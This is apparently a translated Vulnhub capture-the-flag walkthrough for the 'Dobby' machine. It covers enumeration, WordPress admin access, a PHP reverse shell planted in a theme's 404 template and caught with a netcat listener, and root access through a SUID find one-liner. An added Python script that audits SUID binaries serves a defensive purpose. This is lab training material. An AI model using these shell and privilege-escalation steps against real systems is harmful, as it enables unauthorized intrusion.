Dobby
Identifying the target host IP address
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo netdiscover -i eth1
Using the netdiscover tool that ships with Kali Linux, the target host's IP address is identified as 192.168.56.186.
NMAP scan
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.186 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-17 20:22 EST
Nmap scan report for 192.168.56.186
Host is up (0.00055s latency).
Not shown: 65534 closed tcp ports (reset)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Ubuntu))
|_http-title: Draco:dG9vIGVhc3kgbm8/IFBvdHRlcg==
|_http-server-header: Apache/2.4.46 (Ubuntu)
MAC Address: 08:00:27:85:C2:A7 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.99 seconds
From the NMAP scan results, the target host has only one open port, 80, running an HTTP service. Note that the page title is a base64-encoded string; decode it first:
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ echo "dG9vIGVhc3kgbm8/IFBvdHRlcg==" | base64 -d
too easy no? Potter
It is not clear whether Potter is a username; set it aside for now.
Get Access
Visiting port 80 in a browser returns the Apache default page (apart from the title noted above), but the page source contains a comment:
<!--
See: /alohomora
-->
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/alohomora/
Draco's password is his house ;)
Regardless, first scan for directories:
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ gobuster dir -u http://192.168.56.186 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.186
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.2.0-dev
[+] Timeout: 10s
===============================================================
2022/11/17 21:02:20 Starting gobuster in directory enumeration mode
===============================================================
/log (Status: 200) [Size: 45]
/server-status (Status: 403) [Size: 279]
Progress: 218431 / 220561 (99.03%)
===============================================================
2022/11/17 21:02:47 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Dobby]
└─$ curl http://192.168.56.186/log
pass:OjppbGlrZXNvY2tz
hint --> /DiagonAlley
A password appears here, along with another hint, which should be a directory; try it.
Visit that directory in a browser:
http://192.168.56.186/DiagonAlley/
The returned page makes it obvious that this is a WordPress site, and one blog post stands out: it is clearly encoded. It turns out to be Brainfuck, but decoding it yields garbage, which is odd.
Next, see whether the WordPress admin panel can be logged into. Logging in with draco and the password OjppbGlrZXNvY2 fails authentication, strangely!
Perhaps this password is also encoded; base64-decoding it gives: ::ilikesocks
But the decoded password also fails to authenticate, so this clue may be the wrong one.
The earlier hint said Draco's password is his house.
A Google search for draco's house name points to Slytherin.
Try logging in with it: the login succeeds. After logging in, first change the language to English.
Next, find a way to get the shell.php script into the WordPress backend.
Appearance->Theme Editor->404 Template: the PHP code of the 404 page is successfully replaced with the shell.php code.
Looking at the page source:
<link rel='stylesheet' id='admin-bar-css' href='http://192.168.56.186/DiagonAlley/wp-includes/css/admin-bar.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='wp-block-library-css' href='http://192.168.56.186/DiagonAlley/wp-includes/css/dist/block-library/style.min.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-bootstrap-grid-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/bootstrap-grid.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='font-awesome-5-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/css/fontawesome-all.css?ver=5.5.3' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-fonts-css' href='https://fonts.googleapis.com/css?family=Poppins%3A400%2C400i%2C700%2C700i%7CRubik%3A400%2C400i%2C700%2C700i&subset=latin%2Clatin-ext' type='text/css' media='all' />
<link rel='stylesheet' id='amphibious-style-css' href='http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious/style.css?ver=5.5.3' type='text/css' media='all' />
The location of the 404 page can be guessed as:
http://192.168.56.186/DiagonAlley/wp-content/themes/amphibious
└─$ sudo nc -nlvp 5555
[sudo] password for kali:
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.186] 38798
Linux HogWarts 5.8.0-26-generic #27-Ubuntu SMP Wed Oct 21 22:29:16 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
03:37:42 up 1:21, 0 users, load average: 0.00, 0.00, 0.02
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ which python
$ which python3
/usr/bin/python3
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@HogWarts:/$
The reverse shell from the target host is received successfully on Kali Linux:
www-data@HogWarts:/home/dobby$ cat flag1.txt
cat flag1.txt
Command 'cat' not found, but can be installed with:
apt install coreutils
Please ask your administrator.
www-data@HogWarts:/home/dobby$ echo $PATH
echo $PATH
/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin
www-data@HogWarts:/home/dobby$ which cat
which cat
www-data@HogWarts:/home/dobby$ ls
ls
Descargas Escritorio Música Público flag1.txt
Documentos Imágenes Plantillas Vídeos sudoers
www-data@HogWarts:/home/dobby$ more flag1.txt
more flag1.txt
"Harry potter this year should not go to the school of wizardry"
flag1{28327a4964cb391d74111a185a5047ad}
www-data@HogWarts:/home/dobby$
This gives the user flag. The cat command cannot be used here, so more is used to display the file instead.
Privilege escalation
Upload the linpeas.sh script to the target host's tmp directory, change its permissions, and run it.
However, we obtained another password earlier; it is not known whether it is dobby's password, so try it first.
Ha, it actually works: the password is ilikesocks.
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: OjppbGlrZXNvY2
su: Authentication failure
www-data@HogWarts:/tmp$ su - dobby
su - dobby
Password: ilikesocks
dobby@HogWarts:~$
Reviewing the linpeas.sh output shows that the find command has the SUID bit set; privilege escalation follows the method given on the GTFOBins site.
╔═══════════════════╗
═══════════════════════════════╣ Interesting Files ╠═══════════════════════════════
╚═══════════════════╝
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
-rwsr-xr-x 1 root root 109K Oct 8 2020 /snap/snapd/9721/usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-x 1 root root 43K Mar 5 2020 /snap/core18/1885/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1885/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/bin/su
-rwsr-xr-x 1 root root 27K Mar 5 2020 /snap/core18/1885/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1885/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1885/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1885/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1885/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1885/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1885/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1885/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 43K Sep 16 2020 /snap/core18/1932/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 63K Jun 28 2019 /snap/core18/1932/bin/ping
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/bin/su
-rwsr-xr-x 1 root root 27K Sep 16 2020 /snap/core18/1932/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 44K Mar 22 2019 /snap/core18/1932/usr/bin/chsh
-rwsr-xr-x 1 root root 75K Mar 22 2019 /snap/core18/1932/usr/bin/gpasswd
-rwsr-xr-x 1 root root 40K Mar 22 2019 /snap/core18/1932/usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 59K Mar 22 2019 /snap/core18/1932/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 146K Jan 31 2020 /snap/core18/1932/usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-- 1 root systemd-network 42K Jun 11 2020 /snap/core18/1932/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 427K Mar 4 2019 /snap/core18/1932/usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 23K Aug 3 2020 /usr/libexec/polkit-agent-helper-1
-rwsr-xr-- 1 root sssd 92K Oct 6 2020 /usr/libexec/sssd/ldap_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 83K Oct 6 2020 /usr/libexec/sssd/p11_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 168K Oct 6 2020 /usr/libexec/sssd/krb5_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 31K Oct 6 2020 /usr/libexec/sssd/proxy_child (Unknown SUID binary!)
-rwsr-xr-- 1 root sssd 56K Oct 6 2020 /usr/libexec/sssd/selinux_child (Unknown SUID binary!)
-rwsr-xr-- 1 root dip 386K Jul 23 2020 /usr/sbin/pppd ---> Apple_Mac_OSX_10.4.8(05-2007)
-rwsr-xr-x 1 root root 15K Sep 29 2020 /usr/bin/vmware-user-suid-wrapper
-rwsr-xr-x 1 root root 71K Aug 30 2020 /usr/bin/su
-rwsr-xr-x 1 root root 67K May 28 2020 /usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 179K Jul 8 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 84K May 28 2020 /usr/bin/chfn ---> SuSE_9.3/10
-rwsr-xr-x 1 root root 47K Jul 24 2020 /usr/bin/base32
-rwsr-xr-x 1 root root 87K May 28 2020 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 313K Sep 30 2020 /usr/bin/find
-rwsr-xr-x 1 root root 31K Aug 3 2020 /usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
-rwsr-xr-x 1 root root 52K May 28 2020 /usr/bin/chsh
-rwsr-xr-x 1 root root 55K Aug 30 2020 /usr/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
-rwsr-xr-x 1 root root 39K Aug 30 2020 /usr/bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 44K May 28 2020 /usr/bin/newgrp ---> HP-UX_10.20
-rwsr-xr-x 1 root root 39K Mar 7 2020 /usr/bin/fusermount
-rwsr-xr-x 1 root root 467K Jun 7 2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 131K Oct 19 2020 /usr/lib/snapd/snap-confine ---> Ubuntu_snapd<2.37_dirty_sock_Local_Privilege_Escalation(CVE-2019-7304)
-rwsr-xr-- 1 root messagebus 51K Sep 10 2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 root root 15K Oct 7 2020 /usr/lib/xorg/Xorg.wrap
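A defender's counterpart to the linpeas SUID listing above, added here as an example that is not part of the original post: parse `ls -l`-style lines and report root-owned SUID files that are not in a known-good baseline, so that additions like /usr/bin/find and /usr/bin/base32 stand out. The BASELINE set is an assumed, illustrative subset of a stock Ubuntu install (a real audit would generate it from a clean reference image), and the SAMPLE lines are constructed.

```python
import re

# Assumed, illustrative baseline of SUID binaries on a stock Ubuntu install.
BASELINE = {
    "/usr/bin/su", "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chfn",
    "/usr/bin/chsh", "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/mount",
    "/usr/bin/umount", "/usr/bin/pkexec", "/usr/bin/fusermount",
    "/usr/lib/openssh/ssh-keysign", "/usr/lib/snapd/snap-confine",
}

# Mode, link count, owner, group, then the first absolute path on the line
# (linpeas appends "---> hint" text after the path, which this ignores).
LS_LINE = re.compile(
    r"^(?P<mode>[-a-z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)\s+.*?(?P<path>/\S+)"
)


def parse_ls_line(line):
    """Return mode flags, owner and path from one `ls -l` line, or None."""
    m = LS_LINE.match(line.strip())
    if not m:
        return None
    mode = m.group("mode")
    return {
        "path": m.group("path"),
        "owner": m.group("owner"),
        "setuid": mode[3] == "s",  # 's' in the owner-execute slot
        "setgid": mode[6] == "s",  # 's' in the group-execute slot
    }


def audit_suid(lines, baseline=BASELINE):
    """Paths of root-owned SUID files that are not in the baseline."""
    findings = []
    for line in lines:
        e = parse_ls_line(line)
        if e and e["setuid"] and e["owner"] == "root" and e["path"] not in baseline:
            findings.append(e["path"])
    return findings


# Constructed sample in the `ls -l` format linpeas prints.
SAMPLE = """\
-rwsr-xr-x 1 root root 71K Aug 30 2020 /usr/bin/su
-rwsr-xr-x 1 root root 47K Jul 24 2020 /usr/bin/base32
-rwsr-xr-x 1 root root 313K Sep 30 2020 /usr/bin/find
-rwxr-sr-x 1 root tty 35K Sep 30 2020 /usr/bin/wall
-rwsr-xr-x 1 root root 179K Jul 8 2020 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
strings Not Found
""".splitlines()

if __name__ == "__main__":
    for path in audit_suid(SAMPLE):
        print("unexpected SUID binary:", path)
```

On a live host, feed it the output of `find / -perm -4000 -type f -exec ls -l {} +` instead of SAMPLE.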
dobby@HogWarts:/var/www/html/DiagonAlley$ ls -alh /usr/bin/find
ls -alh /usr/bin/find
-rwsr-xr-x 1 root root 313K sep 30 2020 /usr/bin/find
dobby@HogWarts:/var/www/html/DiagonAlley$ /usr/bin/find . -exec /bin/sh -p \; -quit
<onAlley$ /usr/bin/find . -exec /bin/sh -p \; -quit
# id
id
uid=1000(dobby) gid=1000(dobby) euid=0(root) grupos=1000(dobby),4(adm),24(cdrom),30(dip),46(plugdev),121(lpadmin),132(lxd),133(sambashare)
# cd /root
cd /root
# ls -alh
ls -alh
total 32K
drwx------ 4 root root 4,0K nov 7 2020 .
drwxr-xr-x 20 root root 4,0K nov 7 2020 ..
-rw------- 1 root root 162 nov 7 2020 .bash_history
-rw-r--r-- 1 root root 3,1K ago 14 2019 .bashrc
drwx------ 2 root root 4,0K oct 22 2020 .cache
drwxr-xr-x 3 root root 4,0K nov 7 2020 .local
-rw-r--r-- 1 root root 161 sep 16 2020 .profile
-rw-r--r-- 1 root root 1,4K nov 7 2020 proof.txt
# cat proof.txt
cat proof.txt
/bin/sh: 4: cat: not found
# more proof.txt
more proof.txt
[ASCII-art banner from proof.txt, garbled by extraction; the legible part reads "AND THE SORCERER'S STONE"]
root{63a9f0ea7bb98050796b649e85481845!!}
#
The root flag is obtained successfully.
From: https://www.cnblogs.com/jason-huawen/p/16902562.html